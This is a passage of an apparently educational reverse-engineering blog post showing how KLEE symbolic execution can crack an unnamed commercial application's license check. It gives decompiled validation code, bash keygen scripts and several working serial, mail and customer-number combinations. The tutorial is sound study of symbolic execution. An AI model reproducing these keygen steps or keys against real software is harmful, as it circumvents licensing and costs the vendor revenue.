KLEE: NOTE: now ignoring this error at this location
...

To fix this we can use the KLEE uClibc and POSIX runtime. Taken from the help:

"If we were running a normal native application, it would have been linked with the C library, but in this case KLEE is running the LLVM bitcode file directly. In order for KLEE to work effectively, it needs to have definitions for all the external functions the program may call. Similarly, a native application would be running on top of an operating system that provides lower level facilities like write(), which the C library uses in its implementation. As before, KLEE needs definitions for these functions in order to fully understand the program. We provide a POSIX runtime which is designed to work with KLEE and the uClibc library to provide the majority of operating system facilities used by command line applications".

Let's try to use these facilities to test our atoi function:

$ klee --optimize --libc=uclibc --posix-runtime atoi.ll --sym-args 0 1 3
KLEE: NOTE: Using klee-uclibc : /usr/local/lib/klee/runtime/klee-uclibc.bca
KLEE: NOTE: Using model: /usr/local/lib/klee/runtime/libkleeRuntimePOSIX.bca
KLEE: output directory is "/work/klee-out-5"
KLEE: WARNING ONCE: calling external: syscall(16, 0, 21505, 70495424)
KLEE: ERROR: /tmp/klee-uclibc/libc/stdlib/stdlib.c:526: memory error: out of bound pointer
KLEE: NOTE: now ignoring this error at this location

KLEE: done: total instructions = 5756
KLEE: done: completed paths = 68
KLEE: done: generated tests = 68

And KLEE founds the possible out of bound access in our program. Because you know, our program is bugged :) Before to jump and fix our code, let me briefly explain what these new flags did:

  • --optimize: this is for dead code elimination. It is actually a good idea to use this flag when working with non-trivial applications, since it speeds things up;
  • --libc=uclibc and --posix-runtime: these are the aforementioned options for uClibc and POSIX runtime;
  • --sym-args 0 1 3: this flag tells KLEE to run the program with minimum 0 and maximum 1 argument of length 3, and make the arguments symbolic.

Note that adding atoi function to our code, adds 68 execution paths to the program. Using many libc functions in our code adds complexity, so we have to use them carefully when we want to reverse complex functions.

Let now make the program safe by adding a check to the command line argument length. Let's also add an assertion, because it is fun :)

#include <stdlib.h>
#include <assert.h>
#include <klee/klee.h>

int main(int argc, char* argv[]) {
    int result = argc > 1 ? atoi(argv[1]) : 0;
    if (result == 42)
        klee_assert(0);
    return result;
}

We could also have written klee_assert(result != 42), and get the same result. No matter what solution we adopt, now we have to run KLEE as before:

$ clang -emit-llvm -g -o atoi2.ll -c atoi2.c
$ klee --optimize --libc=uclibc --posix-runtime atoi2.ll --sym-args 0 1 3
KLEE: NOTE: Using klee-uclibc : /usr/local/lib/klee/runtime/klee-uclibc.bca
KLEE: NOTE: Using model: /usr/local/lib/klee/runtime/libkleeRuntimePOSIX.bca
KLEE: output directory is "/work/klee-out-6"
KLEE: WARNING ONCE: calling external: syscall(16, 0, 21505, 53243904)
KLEE: ERROR: /work/atoi2.c:8: ASSERTION FAIL: 0
KLEE: NOTE: now ignoring this error at this location

KLEE: done: total instructions = 5962
KLEE: done: completed paths = 73
KLEE: done: generated tests = 69

Here we go! We have fixed our bug. KLEE is also able to find an input to make the assertion fail:

$ ls klee-last/ | grep err
test000016.assert.err
$ ktest-tool klee-last/test000016.ktest
ktest file : 'klee-last/test000016.ktest'
args       : ['atoi.ll', '--sym-args', '0', '1', '3']
num objects: 3
...
object    1: name: 'arg0'
object    1: size: 4
object    1: data: '+42\x00'
...

And the answer is the string "+42"... as we know.

There are many other KLEE options and functionalities, but let's move on and try to solve our original problem. Interested readers can find a good tutorial, for example, in How to Use KLEE to Test GNU Coreutils.

KLEE keygen

Now that we know basic KLEE commands, we can try to apply them to our particular case. We have understood some of the validation algorithm, but we don't know the computation details. They are just a mess of arithmetical and logical operations that we are tired to analyze.

Here is our plan:

  • we need at least a valid customer number, a serial number and a mail address;
  • more ambitiously we want a list of them, to make a key generator.

This is a possibility:

// copy and paste of all the registration code
enum {
    ERROR,
    STANDARD,
    PRO
} license_type = ERROR;
// ...
enum result_t check_registration(int serial, int customer_num, const char* mail);
// ...

int main(int argc, char* argv[]) {
    int serial, customer;
    char mail[10];
    enum result_t result;
    klee_make_symbolic(&serial, sizeof(serial), "serial");
    klee_make_symbolic(&customer, sizeof(customer), "customer");
    klee_make_symbolic(&mail, sizeof(mail), "mail");

    valid = check_registration(serial, customer, mail);
    valid &= license_type == PRO;
    klee_assert(!valid);
}

Super simple. Copy and paste everything, make the inputs symbolic and assert a certain result (negated, of course).

No! That's not so simple. This is actually the most difficult part of the game. First of all, what do we want to copy? We don't have the source code. In my case I used Hex-Rays decompiler, so maybe I have cheated. When you decompile, however, you don't get immediately a compilable C source code, since there could be dependencies between functions, global variables, and specific Hex-Rays types. For this latter problem I've prepared a ida_defs.h header, providing defines coming from IDA and from Windows headers.

But what to copy? The high level picture of the validation algorithm I have presented is an ideal one. The check_registration function is actually a big set of auxiliary functions and data, very tightened with other parts of the program. Even if we now know the most interesting functions, we need to know how much of the related code, is useful or not. We cannot throw everything in our key generator, since every function brings itself other related data and functions. In this way we will end up having the whole program in it. We need to minimize the code KLEE has to analyze, otherwise it will be too difficult to have its job done.

This is a picture of the high level workflow, as IDA proximity view proposes:

Known license functions

and this is the overview for a single node of this schema (precisely license_getType):

license_getType overview

As you can imagine, the complete call graph becomes really big in the end.

In the cleanup process I have done, a big bunch of functions removed is the one extracting and loading the table of valid mail addresses. To do this I stepped with the debugger until the table was completely loaded and then dumped the memory of the process. Then I've used a nice "export to C array" functionality of HEX Workshop, to export the actual piece of memory of the mail table to actual code:

uint16_t hashHeader[8192] =
{
    0x0, 0x28, 0x12, 0x24, 0x2d, 0x2b, 0x2e, 0x23, 0x2b, 0x26,
    // ...
};
int16_t hashData[1000000] =
{
    15306, 18899, 18957, -24162, 63045, -26834, -21, -39653, 271441, -5588,
    // ...
};

But, cutting out code is not the only problem I've found in this step. External constraints must be carefully considered. For example the time function can be handled by KLEE itself. KLEE tries to generate useful values even from that function. This is good if we want to test bugs related to a strange current time, but in our case, since the code will be executed by the program at a particular time, we are only interested in the value provided at that time. We don't want KLEE traits this function as symbolic; we only want the right time value. To solve that problem, I have replaced all the calls to time to a my_time function, returning a fixed value, defined in the source code.

Another problem comes from the extraction of the functions from their outer context. Often code is written with implicit conventions in mind. These are not self-evident in the code because checks are avoided. A trivial example is the null terminator and valid ASCII characters in strings. KLEE does not assume those constraints, but the validation code does. This is because the GUI provides only valid strings. A less trivial example is that the mail address is always passed lowercase from the GUI to the lower level application logic. This is not self-evident if you do not follow every step from the user input to the actual computations with the data.

The solution to this latter problem is to provide those constraints to KLEE:

char mail[10];
char c;
klee_make_symbolic(mail, sizeof(mail), "mail");
for (i = 0; i < sizeof(mail) - 1; ++i) {
    c = mail[i];
    klee_assume( (c >= '0' & c <= '9') | (c >= 'a' & c <= 'z') | c == '\0' );
}
klee_assume(mail[sizeof(mail) - 1] == '\0');

Logical operators inside klee_assume function are bitwise and not logical (i.e. & and | instead of && and ||) because they are simpler, since they do not add the extra branches required by lazy operators.

Throw everything into KLEE

Having extracted all the needed functions and global data and solved all the issues with the code, we can now move on and run KLEE with our brand new test program:

$ clang -emit-llvm -g -o attempt1.ll -c attempt1.c
$ klee --optimize --libc=uclibc --posix-runtime attempt1.ll

And then wait for an answer.

And wait for another while.

Make some coffee, drink it, come back and watch the PC heating up.

Go out, walk around, come back, have a shower, and.... oh no! It's still running! OK, that's enough! Let's kill it.

Deconstruction approach

We have assumed too much from the tool. It's time to use the brain and ease its work a little bit.

Let's decompose the big picture of the registration check presented before piece by piece. We will try to solve it bit by bit, to reduce the solution space and so, the complexity.

Recall that the algorithm is composed by three main conditions:

  • serial number must be valid by itself;
  • serial number, combined with mail address have to correspond to the actual customer number;
  • there has to be a correspondence between serial number and mail address, stored in a static table in the binary.

Can we split them in different KLEE runs?

Clearly the first one can be written as:

#include <assert.h>
#include <klee/klee.h>
// include all the functions extracted from the program
#include "extracted_code.c"

enum {
    ERROR,
    STANDARD,
    PRO
} license_type = ERROR;

int main(int argc, char* argv[]) {
    int serial, valid;
    klee_make_symbolic(&serial, sizeof(serial), "serial");
    license_type = get_license_type(serial);
    valid = (license_type == PRO);
    klee_assert(!valid);
}

And let's see if KLEE can work with this single function:

$ clang -emit-llvm -g -o serial_type.ll -c serial_type.c
$ klee --optimize --libc=uclibc --posix-runtime serial_type.ll
...
KLEE: ERROR: /work/symbolic/serial_type.c:17: ASSERTION FAIL: !valid
...

$ ls klee-last/ | grep err
test000019.assert.err
$ ktest-tool --write-ints klee-last/test000019.ktest 
ktest file : 'klee-last/test000019.ktest'
args       : ['serial_type.ll']
num objects: 2
object    0: name: 'model_version'
object    0: size: 4
object    0: data: 1
object    1: name: 'serial'
object    1: size: 4
object    1: data: 102690141

Yes! we now have a serial number that is considered PRO by our target application.

The third condition is less simple: we have a table in which are stored values matching mail addresses with serial numbers. The high level check is this:

int check(int serial, char* mail) {
    int index = get_index_in_mail_table(serial);
    if (index > HEADER_SIZE)
        return VALID_IF_LAST_VERSION;
    int mail_digest = compute_mail_digest(mail);
    for (int i = 0; i < 3; ++i) {
        if (mail_digest_table[index + i] == mail_digest)
            return VALID;
    }
    return INVALID;
}

This piece of code imposes constraints on our mail address and serial number, but not on the customer number. We can rewrite the checks in two parts, the one checking the serial, and the one checking the mail address:

int check_serial(int serial, char* mail) {
    int index = get_index_in_mail_table(serial);
    int valid = index <= HEADER_SIZE;
}

int check_mail(char* mail, int index) {
    int mail_digest = compute_mail_digest(mail);
    for (int i = 0; i < 3; ++i) {
        if (mail_digest_table[index + i] == mail_digest)
            return 1;
    }
    return 0;
}

The check_mail function needs the index in the table as secondary input, so it is not completely independent from the other check function. However, check_mail can be incorporated by our successful test program used before:

// ...

int main(int argc, char* argv[]) {
    int serial, valid, index;
    klee_make_symbolic(&serial, sizeof(serial), "serial");
    license_type = get_license_type(serial);
    valid = (license_type == PRO);
    // added just now
    index = get_index_in_mail_table(serial);
    valid &= index <= HEADER_SIZE;

    klee_assert(!valid);
}

And if we run it, we get our revised serial number, that satisfies the additional constraint:

$ clang -emit-llvm -g -o serial.ll -c serial.c
$ klee --optimize --libc=uclibc --posix-runtime serial.ll
...
KLEE: ERROR: /work/symbolic/serial.c:21: ASSERTION FAIL: !valid
...

$ ls klee-last/ | grep err
test000032.assert.err
$ ktest-tool --write-ints klee-last/test000019.ktest 
...
object    1: name: 'serial'
object    1: data: 120300641
...

For those who are wondering if get_index_in_mail_table could return a negative index, and so possibly crash the program I can answer that they are not alone. @0vercl0k asked me the same question, and unfortunately I have to answer a no. I tried, because I am a lazy ass, by changing the assertion above to klee_assert(index < 0), but it was not triggered by KLEE. I then manually checked the function's code and I saw a beautiful if (result < 0) result = 0. So, the answer is no! You have not found a vulnerability in the application :(

For the check_mail solution we have to provide the index of a serial, but wait... we have it! We have now a serial, so, computing the index of the table is simple as executing this:

int index = get_index_in_mail_table(serial);

Therefore, given a serial number, we can solve the mail address in this way:

// ...

int main(int argc, char* argv[]) {
    int serial, valid, index;
    char mail[10];

    // mail is symbolic
    klee_make_symbolic(mail, sizeof(mail), "mail");
    for (i = 0; i < sizeof(mail) - 1; ++i)
    {
        c = mail[i];
        klee_assume( (c >= '0' & c <= '9') | (c >= 'a' & c <= 'z') | c == '\0' );
    }
    klee_assume(mail[sizeof(mail) - 1] == '\0');

    // get serial as external input
    if (argc < 2)
        return 1;
    serial = atoi(argv[1]);

    // compute index
    index = get_index_in_mail_table(serial);
    // check validity
    valid = check_mail(mail, index);
    klee_assert(!valid);
}

We only have to run KLEE with the additional serial argument, providing the computed one by the previous step.

$ clang -emit-llvm -g -o mail.ll -c mail.c
$ klee --optimize --libc=uclibc --posix-runtime mail.ll 120300641
...
KLEE: ERROR: /work/symbolic/mail.c:34: ASSERTION FAIL: !valid
...
$ ls klee-last/ | grep err
test000023.assert.err
$ ktest-tool klee-last/test000023.ktest 
...
object    1: name: 'mail'
object    1: data: 'yrwt\x00\x00\x00\x00\x00\x00'
...

OK, the mail found by KLEE is "yrwt". This is not a mail, of course, but in the code there is not a proper validation imposing the presence of '@' and '.' chars, so we are fine with it :)

The last piece of the puzzle we need is the customer number. Here is the check:

int expected_customer = compute_customer_number(serial, mail);
if (expected_customer != customer_num)
    return INVALID;

This is simpler than before, since we already have a serial and a mail, so the only thing missing is a customer number matching those. We can compute it directly, even without symbolic execution:

int main(int argc, char* argv[])
{
    if (argc < 3)
        return 1;

    int serial = atoi(argv[1]);
    char* mail = argv[2];
    int customer_number = compute_customer_number(serial, mail);
    printf("%d\n", customer_number);
    return 0;
}

Let's execute it:

$ gcc customer.c customer
$ ./customer 120300641 yrwt
1175211979

Yeah! And if we try those numbers and mail address onto the real program, we are now legit and registered users :)

Want more keys?

We have just found one key, and that's cool, but what about making a keygen? KLEE is deterministic, so if you run the same code over and over you will get always the same results. So, we are now stuck with this single serial.

To solve the problem we have to think about what variables we can move around to get different valid serial numbers to start with, and with them solve related mail addresses and compute a customer number.

We have to add constraints to the serial generation, so that every time we can run a slightly different version of the program and get a different serial number. The simplest thing to do is to constraint get_index_in_mail_table to return an index inside a proper subset of the range [0, HEADER_SIZE] used before. For example we can divide it in equal chunks of size 5 and run the whole thing for every chunk.

This is the modified version of the serial generation:

int main(int argc, char* argv[]) {
    int serial, min_index, max_index, valid;

    // get chunk bounds as external inputs
    if (argc < 3)
        return 1;
    min_index= atoi(argv[1]);
    max_index= atoi(argv[2]);

    // check and assert
    index = get_index_in_mail_table(serial);
    valid = index >= min_index && index < max_index;
    klee_assert(!valid);
    return 0;
}

We now need a script that runs KLEE and collect the results for all those chunks. Here it is:

#!/bin/bash

MIN_INDEX=0
MAX_INDEX=8033
STEP=5

echo "Index;License;Mail;Customer"

for INDEX in $(seq $MIN_INDEX $STEP $MAX_INDEX); do
    echo -n "$INDEX;"

    CHUNK_MIN=$INDEX
    CHUNK_MAX=$(( CHUNK_MIN + STEP ))
    LICENSE=$(./solve.sh serial.ll $CHUNK_MIN $CHUNK_MAX)
    if [ -z "$LICENSE" ]; then
        echo ";;"
        continue
    fi
    MAIL_ARRAY=$(./solve.sh mail.ll $LICENSE)
    if [ -z "$MAIL_ARRAY" ]; then
        echo ";;"
        continue
    fi
    MAIL=$(sed 's/\\x00//g' <<< $MAIL_ARRAY | sed "s/'//g")
    CUSTOMER=$(./customer $LICENSE $MAIL)

    echo "$LICENSE;$MAIL;$CUSTOMER"
done

This script uses the solve.sh script, that does the actual work and prints the result of KLEE runs:

#!/bin/bash
# do work
klee $@ >/dev/null 2>&1
# print result
ASSERT_FILE=$(ls klee-last | grep .assert.err)
TEST_FILE=$(basename klee-last/$ASSERT_FILE .assert.err)
OUTPUT=$(ktest-tool --write-ints klee-last/$TEST_FILE.ktest | grep data)
RESULT=$(sed 's/.*:.*: //' <<< $OUTPUT)
echo $RESULT
# cleanup
rm -rf $(readlink -f klee-last)
rm -f klee-last

Here is the final run:

$ ./keygen_all.sh
Index;License;Mail;Customer
...
2400;;;
2405;115019227;4h79;1162863222
2410;112625605;7cxd;554797040
...

Note that not all the serial numbers are solvable, but we are OK with that. We now have a bunch of solved registrations. We can put them in some simple GUI that exposes to the user one of them randomly.

That's all folks.

Conclusion

This was a brief journey into the magic world of reversing and symbolic execution. We started with the dream to make a key generator for a real world application, and we've got a list of serial numbers to put in some nice GUI (maybe with some MIDI soundtrack playing in the background to make users crazy). But this was not our purpose. The path we followed is far more interesting than ruining programmer's life. So, just to recap, here are the main steps we followed to generate our serial numbers:

  1. reverse the skeleton of the serial number validation procedure, understanding data and the most important functions, using a debugger, IDA, and all the reversing tools we can access;
  2. collect the functions and produce a C version of them (this could be quite difficult, unless you have access to HEX-Rays decompiler or similar tool);
  3. mark some strategic variable as symbolic and mark some strategic code path with an assert;
  4. ask KLEE to provide us the values for symbolic variables that make the assert to fail, and so to reach that code path;
  5. since the last step provides us only a single serial number, add an external input to the symbolic program, using it as additional constraint, in order to get different values for symbolic variables reaching the assert.

The last point can be seen as quite obscure, I can admit that, but the idea is simple. Since KLEE's goal is to reach a path with some values for the symbolic variables, it is not interested in exploring all the possibilities for those values. We can force this exploration manually, by adding an additional constraint, and varying a parameter from run to run, and get (hopefully) different correct values for our serial number.

I would like to thank @0vercl0k, @jonathansalwan and @__x86 for their careful proofreading and good remarks!

I hope you found this topic interesting. In the case, here are some links that can be useful for you to deepen some of the arguments touched in this post:

Source code, examples and scripts used to produce this blog post are published in this GitHub repo.

Cheers, @brt_device.

❌
❌